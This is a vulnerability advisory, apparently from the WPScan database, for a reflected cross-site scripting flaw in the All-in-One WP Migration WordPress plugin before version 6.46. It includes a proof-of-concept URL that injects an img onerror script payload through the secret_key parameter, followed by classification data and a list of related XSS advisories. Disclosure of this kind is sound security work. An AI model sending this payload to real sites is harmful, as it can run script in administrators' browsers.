WordPress Plugin Vulnerabilities

All-in-One WP Migration < 6.46 - Reflected Cross-Site Scripting (XSS)

Description

All-in-One WP Migration is vulnerable to Reflected Cross-Site Scripting on secret_key parameter.

Proof of Concept

http://example.com/wp-admin/admin-ajax.php?action=ai1wm_status&secret_key="}<img src=x onerror=alert(1)><!--

Affects Plugins

Plugin icon
all-in-one-wp-migration
Fixed in 6.46

References

URL
https://wordpress.org/plugins/all-in-one-wp-migration/#developers

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
6.1 (medium)

Miscellaneous

Submitter
Oways
Submitter twitter
@0w4ys
Verified
No
WPVDB ID
fc104922-b141-43dc-b91e-c9d9518a541c

Timeline

Publicly Published
2017-06-20 (about 6 years ago)
Added
2017-06-21 (about 6 years ago)
Last Updated
2021-03-23 (about 3 years ago)

Other

Published
Title
Published
2014-08-01
Title
Popup Images - popup-images/popup.php z Parameter XSS
Published
2023-06-19
Title
Image Protector <= 1.1 - Admin+ Stored Cross-Site Scripting
Published
2023-02-02
Title
Usersnap < 4.17 - Admin+ Stored XSS
Published
2022-02-15
Title
Persian Woocommerce < 5.9.8 - Reflected Cross-Site Scripting
Published
2019-07-09
Title
Gallery Photoblocks < 1.1.43 - Authenticated Reflected XSS